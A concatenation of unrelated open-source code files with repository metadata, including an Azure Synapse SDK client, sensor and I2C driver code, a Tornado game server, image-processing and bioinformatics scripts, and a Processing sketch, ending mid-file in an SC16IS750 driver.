continuation_token=cont_token, client=self._client, deserialization_callback=get_long_running_output, ) return LROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore begin_delete_spark_configuration.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}"} def _rename_spark_configuration_initial( # pylint: disable=inconsistent-return-statements self, spark_configuration_name: str, new_name: Optional[str] = None, **kwargs: Any ) -> None: error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError, 304: ResourceNotModifiedError, } error_map.update(kwargs.pop("error_map", {}) or {}) _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {}) _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version: Literal["2021-06-01-preview"] = kwargs.pop( "api_version", _params.pop("api-version", "2021-06-01-preview") ) content_type: str = kwargs.pop("content_type", _headers.pop("Content-Type", "application/json")) cls: ClsType[None] = kwargs.pop("cls", None) _request = _models.ArtifactRenameRequest(new_name=new_name) _json = self._serialize.body(_request, "ArtifactRenameRequest") request = build_rename_spark_configuration_request( spark_configuration_name=spark_configuration_name, api_version=api_version, content_type=content_type, json=_json, template_url=self._rename_spark_configuration_initial.metadata["url"], headers=_headers, params=_params, ) request = _convert_request(request) path_format_arguments = { "endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True), } request.url = self._client.format_url(request.url, **path_format_arguments) pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access request, stream=False, **kwargs ) response = pipeline_response.http_response if response.status_code not in [200, 202]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response) if cls: return cls(pipeline_response, None, {}) _rename_spark_configuration_initial.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}/rename"} @distributed_trace def begin_rename_spark_configuration( self, spark_configuration_name: str, new_name: Optional[str] = None, **kwargs: Any ) -> LROPoller[None]: """Renames a sparkConfiguration. :param spark_configuration_name: The spark Configuration name. Required. :type spark_configuration_name: str :param new_name: New name of the artifact. Default value is None. :type new_name: str :keyword callable cls: A custom type or function that will be passed the direct response :keyword str continuation_token: A continuation token to restart a poller from a saved state. :keyword polling: By default, your polling method will be LROBasePolling. Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy. :paramtype polling: bool or ~azure.core.polling.PollingMethod :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present. :return: An instance of LROPoller that returns either None or the result of cls(response) :rtype: ~azure.core.polling.LROPoller[None] :raises ~azure.core.exceptions.HttpResponseError: """ _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {}) _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version: Literal["2021-06-01-preview"] = kwargs.pop( "api_version", _params.pop("api-version", "2021-06-01-preview") ) content_type: str = kwargs.pop("content_type", _headers.pop("Content-Type", "application/json")) cls: ClsType[None] = kwargs.pop("cls", None) polling: Union[bool, PollingMethod] = kwargs.pop("polling", True) lro_delay = kwargs.pop("polling_interval", self._config.polling_interval) cont_token: Optional[str] = kwargs.pop("continuation_token", None) if cont_token is None: raw_result = self._rename_spark_configuration_initial( # type: ignore spark_configuration_name=spark_configuration_name, new_name=new_name, api_version=api_version, content_type=content_type, cls=lambda x, y, z: x, headers=_headers, params=_params, **kwargs ) kwargs.pop("error_map", None) def get_long_running_output(pipeline_response): # pylint: disable=inconsistent-return-statements if cls: return cls(pipeline_response, None, {}) path_format_arguments = { "endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True), } if polling is True: polling_method: PollingMethod = cast( PollingMethod, LROBasePolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs) ) elif polling is False: polling_method = cast(PollingMethod, NoPolling()) else: polling_method = polling if cont_token: return LROPoller.from_continuation_token( polling_method=polling_method, continuation_token=cont_token, client=self._client, deserialization_callback=get_long_running_output, ) return LROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore begin_rename_spark_configuration.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}/rename"}
cdf669514aaf2c1d7c33248746135d7b0232f29f
184ab7b1f5d6c4a4382cf4ffcf50bbad0f157ef1
/library/aht10/aht10_example.py
46df77a8a71666025fda1409a3c5b7ebdbed9497
[]
no_license
RT-Thread/mpy-snippets
fdd257bb9f44cdc92e52cd39cdc88a57d736fb26
9296d559da275f51845cb9c2f8e2010f66f72cc1
refs/heads/master
2023-06-14T02:20:05.449559
2020-06-03T02:34:47
2020-06-03T02:35:19
198,854,793
28
18
null
2020-05-06T11:32:46
2019-07-25T15:14:56
Python
UTF-8
Python
false
false
517
py
from machine import I2C, Pin from aht10 import AHT10 PIN_CLK = 54 # PD6, get the pin number from get_pin_number.py PIN_SDA = 33 # PC1 clk = Pin(("clk", PIN_CLK), Pin.OUT_OD) # Select the PIN_CLK as the clock sda = Pin(("sda", PIN_SDA), Pin.OUT_OD) # Select the PIN_SDA as the data line i2c = I2C(-1, clk, sda, freq=100000) sensor = AHT10(i2c) sensor.sensor_init() sensor.is_calibration_enabled() print("current temp: %.2f "%sensor.read_temperature()) print("current humi: %.2f %%"%sensor.read_humidity())
fc6660d4b5263329f3ba30e3115d2c3f11ba7cdc
36a5fb4183534c1f7e2523a80c510c4d59746fe9
/sgs/cmd_handlers.py
7bc5a5e76f1656a7f16962450eba8dd8fac19ae0
[]
no_license
morningbzy/SGS
85856ce313a404430fab7fffc5dfc5f9603feaab
23db709af3e56d6082c8283ea2fd6f0caf10e85e
refs/heads/master
2021-01-15T13:18:19.315256
2013-08-07T15:38:39
2013-08-07T15:38:39
10,073,280
2
1
null
null
null
null
UTF-8
Python
false
false
3,143
py
# -*- coding: UTF-8 -*- import logging import tornado.escape import tornado.auth import tornado.web from sgs.user import global_users from sgs.game import global_game from sgs.cmd import Cmd class BaseHandler(tornado.web.RequestHandler): def get_current_user(self): user_json = self.get_secure_cookie("user") if not user_json: return None return tornado.escape.json_decode(user_json) class AuthLoginHandler(BaseHandler): def get(self): self.render("login.html") def post(self): name = self.get_argument("name") user_dict = {'pk': name, 'name': name} if global_users.has_user(name): # TODO: 恢复用户状态 self.redirect("/auth/login") else: global_users.add_user(**user_dict) self.set_secure_cookie("user", tornado.escape.json_encode(user_dict)) self.redirect("/") #class AuthLoginHandler(BaseHandler, tornado.auth.GoogleMixin): # @tornado.web.asynchronous # @gen.coroutine # def get(self): # if self.get_argument("openid.mode", None): # user = yield self.get_authenticated_user() # user_dict = tornado.escape.json_encode(user) # self.set_secure_cookie("sgs_user", user_dict) # self.redirect("/") # return # self.authenticate_redirect(ax_attrs=["name"]) class AuthLogoutHandler(BaseHandler): def get(self): self.clear_cookie("user") self.write("You are now logged out") class IndexHandler(BaseHandler): @tornado.web.authenticated def get(self): if not self.current_user\ or not global_users.has_user(self.current_user['pk']): self.redirect('/auth/login') else: self.render("game.html") class SgsCmdRequestHandler(BaseHandler): @tornado.web.authenticated def post(self): cmd_args = self.request.arguments cmd_args.pop('_xsrf', None) cmd = cmd_args.pop('cmd')[0] cmd_args = dict([(k, v[0]) if len(v) == 1 else v for k, v in cmd_args.iteritems()]) user = global_users.get_user(self.current_user['pk']) if user.seat_id is not None and 'seat_id' not in cmd_args: cmd_args['seat_id'] = user.seat_id cmd = Cmd(cmd, sender=user.pk, **cmd_args) logging.info('<-- [%s] %s' % (cmd, cmd_args)) self.write(dict(cmds=[cmd.get_ack_cmd().to_simple_dict()])) global_game.handle_cmd(cmd) #global_users.broadcast_cmd(cmd) @tornado.web.authenticated @tornado.web.asynchronous def get(self): user_dict = self.get_current_user() user = global_users.get_user(user_dict['pk']) if user: user.get_cmds(self.on_new_cmd) else: self.write(dict(cmds=[])) def on_new_cmd(self, cmds): # Closed client connection if self.request.connection.stream.closed(): user = global_users.get_user(self.get_current_user()['pk']) user.resend_cmd(cmds) return self.finish(dict(cmds=[cmds.to_simple_dict()]))
ecf5f0f62c51ab6359317746fd5f24df8967cb26
d268ee5da12d4eecc7bf97f37ec71ae58fe5854d
/data_set_prep/dataset_prep_scr.py
0cc7adb12c263a0b1b7b24868476e42d26b4213b
[]
no_license
oiynick/rcnn_buildings
b5760727fc0063086362eaffe32e36e2fafc75e7
1be3d554e5e3a0bc13ed086c73f3a87f61e025d5
refs/heads/master
2020-04-28T08:57:19.537442
2019-03-21T12:54:29
2019-03-21T12:54:29
175,148,681
0
0
null
null
null
null
UTF-8
Python
false
false
1,222
py
import numpy as np import shapely from aeronet import dataset as ds def one_sample(fp_json, fp_tif): # Read the JSON file and the TIF image av_features = ds.vector.FeatureCollection.read(fp_json) raster = ds.raster.Band(fp_tif) # Image sizing info and setting up the coordinates samples = raster.generate_samples(512, 512) for i in samples: # Taking bounds of the generated sample bounds = i.bounds # Create a shape of the polygon area = shapely.geometry.polygon((bounds.min_point + bounds.max_point)) # Create a feature based on a shape a_feature = ds.vector.Feature(area) # Find the intersecting features inter = av_features.intersection(a_feature) # For every feature make a feature collection and raster data for feature in inter: offc = ds.vector.FeatureCollection(feature) rasta = ds.transforms.rasterize(offc, i.transform, (512, 512)) yield rasta def main(): amount = 1 res = np.empty(amount, [['complex']]) for i in range(amount): fp_tif = '{}.tif'.format(i) fp_json = '{}.json'.format(i) res[i] = one_sample(fp_json, fp_tif)
dcad9b56560d0941b2a0e5ed5d3b3e2336da3c37
0785df5c1d893a23a77b73617c1b5c10e6ac238f
/local.py
7dd3a4cb48cf307e906381640d9a3d04ea3eccd3
[]
no_license
AnufrievaAnastasia/Project3
dd9482b2c1cb1722c4a1bcfd69f8c3f8210b7fbf
237bf9f9c04704a2e8a22ac4088d4ad805f8eeac
refs/heads/master
2020-08-23T05:03:21.903122
2019-10-21T11:21:05
2019-10-21T11:21:05
216,549,336
0
0
null
null
null
null
UTF-8
Python
false
false
1,297
py
TXT_TASK = 'Игра "Правда или Ложь", на прохождение у вас только две попытки' TXT_ANS_1 = 'Самым твердым природным материалом на Земле является титан ' TXT_ANS_2 = 'В среднем около 10 лет человек проводит во сне ' TXT_ANS_3 = 'Стрекозы - самые быстролетающие насекомые ' TXT_ANS_4 = 'Фильм "Титаник" стоил дороже, чем строительство самого судна в свое время, с учетом инфляции ' TXT_ANS_5 = 'В Норвегии посвятили в рыцари пингвина ' TXT_ANS_6 = 'Муравьи спят утром ' TXT_ANS_7 = 'Карамбола - морская рыба ' TXT_ANS_8 = 'Невежда - невоспитанный и грубый человек ' TXT_ANS_9 = 'В Новой Зеландии язык жестов имеет статус государственного ' TXT_ANS_10 = 'Dell - американская корпорация в области производства компьютеров ' TXT_TRUE = 'правда' TXT_FALSE = 'ложь' TXT_END = 'Игра ЗАКОНЧЕНА!' TXT_WIN = 'Вы ВЫИГРАЛИ!'
4d1858de9f200007868855912c5cb09bbd0ff480
b99255c89683d4123a560a1eb6221b21013d917d
/path_manager/page/category_page.py
f51ce67d375f686b79ed3751f06300e58f94fc61
[ "MIT" ]
permissive
sweetcolor/internet_market_scraper
f7a89e8c54124aadfecaa89f1c84d6c73762ff8b
f7eb8c9ade2c0a956ba5d5b7e6173010c85afed6
refs/heads/master
2021-09-04T04:05:46.529150
2018-01-15T17:02:59
2018-01-15T17:02:59
115,523,578
0
0
null
null
null
null
UTF-8
Python
false
false
156
py
from path_manager.page.page import Page class CategoryPage(Page): def __init__(self, link, parent_page): super().__init__(link, parent_page)
e2e44ffd1b8897513aaba446dd704ac14b2c5945
35dbd536a17d7127a1dd1c70a2903ea0a94a84c2
/src/sentry_plugins/sessionstack/client.py
2c50f1bafe960bbe0331c77cff05e234168642de
[ "Apache-2.0", "BUSL-1.1" ]
permissive
nagyist/sentry
efb3ef642bd0431990ca08c8296217dabf86a3bf
d9dd4f382f96b5c4576b64cbf015db651556c18b
refs/heads/master
2023-09-04T02:55:37.223029
2023-01-09T15:09:44
2023-01-09T15:09:44
48,165,782
0
0
BSD-3-Clause
2022-12-16T19:13:54
2015-12-17T09:42:42
Python
UTF-8
Python
false
false
4,683
py
import requests from sentry.http import safe_urlopen from sentry.utils import json from .utils import add_query_params, get_basic_auth, remove_trailing_slashes ACCESS_TOKEN_NAME = "Sentry" DEFAULT_SENTRY_SOURCE = "sentry" API_URL = "https://api.sessionstack.com" PLAYER_URL = "https://app.sessionstack.com/player" WEBSITES_ENDPOINT = "/v1/websites/{}" SESSION_ENDPOINT = "/v1/websites/{}/sessions/{}" ACCESS_TOKENS_ENDPOINT = "/v1/websites/{}/sessions/{}/access_tokens" SESSION_URL_PATH = "/#/sessions/" MILLISECONDS_BEFORE_EVENT = 5000 class SessionStackClient: def __init__(self, account_email, api_token, website_id, **kwargs): self.website_id = website_id api_url = kwargs.get("api_url") or API_URL self.api_url = remove_trailing_slashes(api_url) player_url = kwargs.get("player_url") or PLAYER_URL self.player_url = remove_trailing_slashes(player_url) self.request_headers = { "Authorization": get_basic_auth(account_email, api_token), "Content-Type": "application/json", } def validate_api_access(self): website_endpoint = WEBSITES_ENDPOINT.format(self.website_id) try: response = self._make_request(website_endpoint, "GET") except requests.exceptions.ConnectionError: raise InvalidApiUrlError if response.status_code == requests.codes.UNAUTHORIZED: raise UnauthorizedError elif response.status_code == requests.codes.BAD_REQUEST: raise InvalidWebsiteIdError elif response.status_code == requests.codes.NOT_FOUND: raise InvalidApiUrlError response.raise_for_status() def get_session_url(self, session_id, event_timestamp): player_url = self.player_url + SESSION_URL_PATH + session_id query_params = {} query_params["source"] = DEFAULT_SENTRY_SOURCE access_token = self._get_access_token(session_id) if access_token is not None: query_params["access_token"] = access_token if event_timestamp is not None: start_timestamp = self._get_session_start_timestamp(session_id) if start_timestamp is not None: pause_at = event_timestamp - start_timestamp play_from = pause_at - MILLISECONDS_BEFORE_EVENT query_params["pause_at"] = pause_at query_params["play_from"] = play_from return add_query_params(player_url, query_params) def _get_access_token(self, session_id): access_token = self._create_access_token(session_id) if not access_token: access_token = self._get_existing_access_token(session_id) return access_token def _get_existing_access_token(self, session_id): response = self._make_access_tokens_request(session_id, "GET") if response.status_code != requests.codes.OK: return None access_tokens = json.loads(response.content).get("data") for token in access_tokens: token_name = token.get("name") if token_name == ACCESS_TOKEN_NAME: return token.get("access_token") return None def _create_access_token(self, session_id): response = self._make_access_tokens_request( session_id=session_id, method="POST", body={"name": ACCESS_TOKEN_NAME} ) if response.status_code != requests.codes.OK: return None return json.loads(response.content).get("access_token") def _make_access_tokens_request(self, session_id, method, **kwargs): access_tokens_endpoint = self._get_access_tokens_endpoint(session_id) return self._make_request(access_tokens_endpoint, method, **kwargs) def _get_access_tokens_endpoint(self, session_id): return ACCESS_TOKENS_ENDPOINT.format(self.website_id, session_id) def _get_session_start_timestamp(self, session_id): endpoint = SESSION_ENDPOINT.format(self.website_id, session_id) response = self._make_request(endpoint, "GET") if response.status_code == requests.codes.OK: return json.loads(response.content).get("client_start") def _make_request(self, endpoint, method, **kwargs): url = self.api_url + endpoint request_kwargs = {"method": method, "headers": self.request_headers} body = kwargs.get("body") if body: request_kwargs["json"] = body return safe_urlopen(url, **request_kwargs) class UnauthorizedError(Exception): pass class InvalidWebsiteIdError(Exception): pass class InvalidApiUrlError(Exception): pass
f5dff936815d2f26b852c4ae10f5bf7d9e9004b8
ed569623f4686688edac40c2dabde0206546316b
/tests/unit/models/company_test.py
00eea0a1fdd38459098b429e193dbf491738925e
[]
no_license
leobene/RadarMiles
34753114854f9dff7ee781060c2f99ec3a54d468
9810b04f29ba5a514dfcbfb0679f304f93842d37
refs/heads/master
2020-04-08T09:13:02.806563
2018-12-03T23:46:58
2018-12-03T23:46:58
159,213,641
1
0
null
null
null
null
UTF-8
Python
false
false
711
py
from models.company import CompanyModel from tests.base_test import BaseTest class CompetitionTest(BaseTest): def test_create_competition(self): company = CompanyModel('GOL') self.assertEqual(company.name, 'GOL', "The name of the company after creation does not equal the constructor argument.") def test_competition_json(self): company = CompanyModel('GOL') expected = { 'id': company.id, 'name': company.name, } self.assertEqual( company.json(), expected, "The JSON export of the company is incorrect. Received {}, expected {}.".format(company.json(), expected))
3c7e5c0670bdcf86f8a00bc3574132e66221f1ea
579f04eda7851cd89e04cd39ecf48a0d09f63244
/mandala/sketch_cat.pyde
4655f0ece0ab99fab7be7870be78a7ab91572cb4
[]
no_license
jralipe/ccs221
0f378492a380b292e35ff7ec27b4e37cb1992726
c70f7834c707c089d2ce01a54b9eda70f50c418f
refs/heads/master
2020-12-28T18:22:15.919736
2020-05-29T00:48:53
2020-05-29T00:48:53
238,438,446
3
27
null
2020-03-05T11:31:06
2020-02-05T11:52:29
Python
UTF-8
Python
false
false
3,287
pyde
#Nyancat by Maria Arlyn Fuerte #BSCS1A catx = 0 caty = 0 flag = True def setup(): size(900, 600) background(25, 25, 112) def draw(): global catx global caty global flag noStroke() background(25, 25, 112) fill(255, 0, 0) #RED rect(0, caty +150, 200, 20) fill(255, 165, 0) #ORANGE rect(0, caty +170, 200, 20) fill(255, 255, 0) #YELLOW rect(0, caty + 190, 200, 20) fill(0, 128, 0) #GREEN rect(0, caty +210, 200, 20) fill(0, 0, 255) #BLUE rect(0, caty +230, 200, 20) fill(75, 0, 130) #Violet rect(0, caty +250, 200, 20) if caty > 280: flag = False if caty > 200: catx +=1 if catx > 250: caty -=1 if caty < 50: catx -=1 if catx < 30: caty +=1 #Pikabody fill(160) rect(200, caty +135, 180, 150) fill(100) rect(215, caty +150, 150, 120) fill(160) rect(215, caty +150, 10, 10) rect(355, caty +150, 10, 10) rect(215, caty +260, 10, 10) #BELT fill(255) rect (240, caty+ 130, 30, 170) #Shadow fill(0) rect(190, caty +145, 10, 150) #left rect(380, caty +145, 10, 150) #right rect(200, caty +285, 180, 10) #bottom rect(210, caty +130, 160, 10) #top rect(200, caty +135, 10, 10) #left rect(370, caty +135, 10, 10) #right rect(190, caty +280, 20, 10) rect(180, caty +290, 10, 20)# backfeet left rect(180, caty +310, 30, 10)#backfeet bottom rect(210, caty +290, 10, 20) #backfeet right rect(230, caty +290, 10, 20) rect(240, caty +310, 20, 10) rect(260, caty +290, 10, 30) #backfeet fill(160) rect(190, caty +290, 20, 20) rect(240, caty +290, 20, 20) #head fill(0) rect(295, caty +220, 140, 40) rect(305, caty +210, 120, 15) rect(315, caty +205, 35, 8) rect(380, caty +205, 35, 8) rect(315, caty +197, 25, 8) rect(390, caty +197, 25, 8) rect(323, caty +189, 10, 8) rect(398, caty +189, 10, 8) rect(305, caty +255, 120, 15) rect(315, caty +270, 100, 20) rect(320, caty +290, 15, 10) rect(330, caty +300, 20, 10) rect(370, caty +290, 15, 10) rect(380, caty +300, 20, 10) fill(128) rect(330, caty +290, 20, 10) rect(380, caty +290, 20, 10) rect(315, caty +225, 110, 30) #eyes fill(20, 20, 20) rect(340, caty +230,20, 20) rect(380, caty +230, 20, 20) fill(235, 235, 235) rect(350, caty +240, 10, 10) rect(390, caty +240, 10, 10) #cheeks fill(250, 182, 193) circle(322, caty +248, 15) circle(418, caty +248, 15) #SWORD fill(50) rect(400, caty +290, 30, 20) rect(430, caty +280, 30, 40) fill(255) rect(460, caty +290, 90, 20)#BLADE #shadow fill(0) rect(390, caty +300, 10, 20) rect(400, caty+ 310, 40, 10) rect(430, caty +320, 40, 10) rect(460, caty +310, 90, 10) rect(550, caty +290, 10, 30) rect(460, caty +280, 90, 10) rect(420, caty +270, 50, 10) rect(410, caty +280, 20, 10) rect(540, caty +290, 10, 10)
63cf85af944332bdcc3cf505a3931ab50cb64c0f
600f361ac85c87dbc3a17cf3908dc0f4267a8c94
/quality-trim.py
2c2ac719751b4fb20d6f92a2f88d1c78ab76ac60
[]
no_license
LeeBergstrand/Bioinformatics_scripts
801f00ea5d4346daf00f92d331f4a87737280ddd
0cfab04ecf43cf4f0aeba2d713532190cfc5eed1
refs/heads/master
2021-01-15T15:23:43.455647
2015-05-05T05:25:55
2015-05-05T05:25:55
19,826,979
3
2
null
null
null
null
UTF-8
Python
false
false
1,170
py
#!/usr/bin/env python import sys import screed import gzip # python quality-trim.py <input fastq file> <output filtered fastq file> # MINLENGTH is the minimum lenth of read desired. NCALLS is the percentage of a read with 'N' base calls for which if read has greater, it will be removed. MINLENGTH = 30 filein = sys.argv[1] fileout = sys.argv[2] fw = open(fileout, 'w') count=0 for n, record in enumerate(screed.open(filein)): name = record['name'] sequence = record['sequence'] accuracy = record['accuracy'] sequence = sequence.rstrip('N') accuracy = accuracy[:len(sequence)] if 'N' in sequence: continue else: trim = accuracy.find('B') if trim > MINLENGTH or (trim == -1 and len(sequence) > MINLENGTH): if trim == -1: fw.write('@%s\n%s\n+\n%s\n' % (name, sequence, accuracy)) else: fw.write('@%s\n%s\n+\n%s\n' % (name, sequence[:trim], accuracy[:trim])) count += 1 if n % 1000 == 0: print 'scanning', n print 'Original Number of Reads', n + 1 print 'Final Number of Reads', count print 'Total Filtered', n + 1 - int(count)
7efbf28a97b17e623a9be0e1d817befa061257fc
fe061550aa4a6d894aba6fc91ec3f4a9c276ee5d
/ALCARAW_RECO/python/pdfSystematics_cff.py
25c61242fc5df1a2a7699333ce47b47e4d7cdd91
[]
no_license
ldcorpe/ECALELF
0f11c04c63cd4ef9c0fac9168d827c8b4d99eada
6f8196c6c455b9ff092007ea5d0e69fc6e68a517
refs/heads/master
2020-12-30T22:08:58.160533
2014-03-05T09:35:07
2014-03-05T09:35:07
17,245,358
0
0
null
2015-07-23T17:14:56
2014-02-27T10:37:42
C++
UTF-8
Python
false
false
727
py
import FWCore.ParameterSet.Config as cms # Produce PDF weights (maximum is 3) pdfWeights = cms.EDProducer("PdfWeightProducer", # Fix POWHEG if buggy (this PDF set will also appear on output, # so only two more PDF sets can be added in PdfSetNames if not "") #FixPOWHEG = cms.untracked.string("cteq66.LHgrid"), #GenTag = cms.untracked.InputTag("genParticles"), PdfInfoTag = cms.untracked.InputTag("generator"), PdfSetNames = cms.untracked.vstring( "cteq66.LHgrid" , "MRST2006nnlo.LHgrid" , "NNPDF10_100.LHgrid" ) )
d31bf01470b66161944add4d5f0c467767484f48
1a7ac4eb338f53e96f92c84d560fd1707607bcc9
/ENV/bin/jupyter
3897bd35c4d09274ecf81879fcf8337d7d1c9519
[]
no_license
kuwar/data-science-python-1
cf3d04dbcf3e57fe6976be7e2f3371ee0eb3304f
2738d00cb339c250fdeca30ad84d9be7ca87e570
refs/heads/master
2022-10-18T09:15:56.181434
2019-09-10T06:39:44
2019-09-10T06:39:44
207,480,173
0
1
null
2022-10-13T06:11:52
2019-09-10T06:20:01
Python
UTF-8
Python
false
false
265
#!/home/saurav/Documents/GitHub/Python/second/ENV/bin/python3 # -*- coding: utf-8 -*- import re import sys from jupyter_core.command import main if __name__ == '__main__': sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) sys.exit(main())
6e295f76fbefde92e0f7d98a4c2ea8a9eb480c01
71e6546941d2763946b69800dfb15679fab70d14
/image_process.py
7b0734e9d6eda4d01c3dc08c071991c44d18d957
[]
no_license
ruitengchang/private
510d58d1ca5ad5cc7ec7147f0ae00249f38da0a4
f9ac73cd1f21d4f1febc0abca627bb1fce2fe3a5
refs/heads/master
2020-06-05T17:12:34.768517
2019-06-18T09:52:55
2019-06-18T09:52:55
192,493,277
0
0
null
null
null
null
UTF-8
Python
false
false
5,368
py
import cv2 as cv import numpy as np import os def line_image(image): gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY) #cv.imshow("gray",gray) edges = cv.Canny(gray, 100, 500, apertureSize=3) #cv.imshow("canny",edges) # contours,hierarchy=cv.findContours(edges,cv.RETR_LIST,cv.CHAIN_APPROX_SIMPLE) # point_size=1 # point_color=(0,0,255) # thickness=4 # print("contours",np.array(contours).shape) # for i in range(np.array(contours).shape[0]): # cv.circle(image,(contours[i][0][0][0],contours[i][0][0][1]),point_size,point_color,thickness) # cv.imshow("result",image) #cv.imshow("lunkuo",contours) #r,g,b=cv.split(image) # cv.connectedComponents(r) # cv.imshow("conn",cv.merge([r,r,r])) #print("dian:",hierarchy) #print("dian shape:",hierarchy.shape) lines = cv.HoughLines(edges, 1, np.pi / 2, 190) #print("lines:",lines.shape) #print(lines) col=[] row=[] #print(col) #print("----") for line in lines: rho, theta = line[0] if(theta<1): col.append(rho) else: row.append(rho) a = np.cos(theta) b = np.sin(theta) x0 = a * rho y0 = b * rho x1 = int(x0 + 2000 * (-b)) y1 = int(y0 + 2000 * (a)) x2 = int(x0 - 2000 * (-b)) y2 = int(y0 - 2000 * (a)) cv.line(image, (x1, y1), (x2, y2), (0, 0, 255), 2) #cv.imshow("hough", image) return col,row def judge(image,p1,p2,p3,p4): count=0.0 r,g,b=cv.split(image) #print(r.shape)#(1080,550) total=float((abs(p4[0]-p1[0]))*(abs(p4[1]-p1[1]))) for i in range(int(abs(p4[0]-p1[0]))): for j in range(int(abs(p4[1]-p1[1]))): x=int(i+p1[0]) y=int(j+p1[1]) if(x>=r.shape[1]): x=r.shape[1]-1 if(y>=r.shape[0]): y=r.shape[0]-1 if(r[y][x]!=255): count=count+1 if(count/total>0.8): #print("find one") return 1 else:return 0 def mkdir(path): # 引入模块 import os # 去除首位空格 path = path.strip() # 去除尾部 \ 符号 path = path.rstrip("\\") # 判断路径是否存在 # 存在 True # 不存在 False isExists = os.path.exists(path) # 判断结果 if not isExists: # 如果不存在则创建目录 # 创建目录操作函数 os.makedirs(path) print(path + ' 创建成功') return True else: # 如果目录存在则不创建,并提示目录已存在 print(path + ' 目录已存在') return False def img_process(input): src = cv.imread(input) _x=src.shape[1] _y=src.shape[0] b,g,r=cv.split(src) for i in range(b.shape[0]): for j in range(b.shape[1]): if(b[i][j]!=255): b[i][j]=0 src_merged=cv.merge([b,b,b])#src:原图,src_merged:二值化的图,需要对两张图都进行直线检测,结合两次直线检测结果。 #cv.imshow("merged",src_merged) #line_image(src)#对原图进行直线检测 col,row=line_image(src_merged)#对二值化图进行直线检测 col.sort() row.sort() if(col[0]>0): col.append(0) col.sort() if(col[len(col)-1]<_x): col.append(_x) if(row[0]>0): row.append(0) row.sort() if(row[len(row)-1]<_y): row.append(_y) #print(row) #print(col) result=[] for i in range(len(col)-2): for j in range(len(row)-2): p1=[col[i],row[j]] p2=[col[i+1],row[j]] p3=[col[i],row[j+1]] p4=[col[i+1],row[j+1]] if(judge(src_merged,p1,p2,p3,p4)==1): result.append([p1,p2,p3,p4]) #print("result",np.array(result).shape) #print(result) # for i in range(len(result)): # print(tuple(result[i])) # cv.rectangle(src_merged,tuple(result[i][0]),tuple(result[i][3]),(0,255,0),2) # cv.imshow("rec",src_merged) while(1):#判断区域之间是能够结合,若能结合则结合 do_sth=0 for i in range(len(result)): for j in range(len(result)-i-1): if((result[i][1]==result[j][0]) & (result[i][3]==result[j][2])): result.append([result[i][0],result[j][1],result[i][2],result[j][3]]) result.remove(result[i]) result.remove(result[j-1]) do_sth=1 break if(do_sth==1): break if(do_sth==0): break #print(result) # for i in range(len(result)): # print(tuple(result[i])) # cv.rectangle(src_merged,tuple(result[i][0]),tuple(result[i][3]),(0,255,0),2) # cv.imshow("rec",src_merged) for i in range(len(result)): new_img=src[int(result[i][0][1]):int(result[i][2][1]),int(result[i][0][0]):int(result[i][1][0])] #cv.imshow("new%d"%(i),new_img) path=input.split(".") #mkdir("%s"%(path[0])) #os.chdir("%s"%(path[0])) filename="%snew%d.jpg"%(path[0],i) print(filename) cv.imwrite(filename,new_img) os.chdir("image_example/1/") print("out path:",os.getcwd()) files=os.listdir() for file in files: img_process(file) cv.waitKey(0) cv.destroyAllWindows()
31508bdac6628284abbbd3294418d6af5c325c67
b8d5270f2af049e795d02887fbe322054b82f600
/SC16IS750.py
28bdf44a54e2501340f0142873eca248d24d6733
[]
no_license
Harri-Renney/SC16IS750
1d73c42aa7fbec05413d7c2e7ea4fca2477e799c
8da36a31ca930ea88af2e73cce6ea163bda3ba25
refs/heads/master
2021-08-18T05:26:22.753747
2020-03-26T20:58:12
2020-03-26T20:58:12
141,274,557
1
1
null
null
null
null
UTF-8
Python
false
false
4,484
py
import smbus from enum import IntEnum class SC16IS750: self.DEVICE_ADDRESS = 0x9A CrystalFrequency = 0 class registers(IntEnum): RHR= 0x00 # Receive Holding Register (R) THR= 0x00 # Transmit Holding Register (W) IER= 0x01 # Interrupt Enable Register (R/W) FCR= 0x02 # FIFO Control Register (W) IIR= 0x02 # Interrupt Identification Register (R) LCR= 0x03 # Line Control Register (R/W) MCR= 0x04 # Modem Control Register (R/W) LSR= 0x05 # Line Status Register (R) MSR= 0x06 # Modem Status Register (R) SPR= 0x07 # Scratchpad Register (R/W) TCR= 0x06 # Transmission Control Register (R/W) TLR= 0x07 # Trigger Level Register (R/W) TXLVL = 0x08 # Transmit FIFO Level Register (R) RXLVL = 0x09 # Receive FIFO Level Register (R) IODIR= 0x0A # I/O pin Direction Register (R/W) IOSTATE= 0x0B # I/O pin States Register (R) IOINTENA= 0x0C # I/O Interrupt Enable Register (R/W) IOCONTROL= 0x0E # I/O pins Control Register (R/W) EFCR= 0x0F # Extra Features Register (R/W) # -- Special Register Set (Requires LCR[7] = 1 & LCR != 0xBF to use) DLL= 0x00 # Divisor Latch LSB (R/W) DLH= 0x01 # Divisor Latch MSB (R/W) # -- Enhanced Register Set (Requires LCR = 0xBF to use) EFR= 0x02 # Enhanced Feature Register (R/W) XON1= 0x04 # XOn1 (R/W) XON2= 0x05 # XOn2 (R/W) XOFF1= 0x06 # XOff1 (R/W) XOFF2= 0x07 # XOff2 (R/W) def init(self, crystalFrequency, deviceaddress=0x9A): print("Initalising SC16IS750.") self.DEVICE_ADDRESS = deviceaddress self.bus = smbus.SMBus(1) self.crystalFrequency = crystalFrequency # def __init__(): def readRegister(self, registerAddress): shiftedDeviceAddress = self.DEVICE_ADDRESS >> 1 shiftedRegisterAddress = registerAddress << 3 registerReadValue = 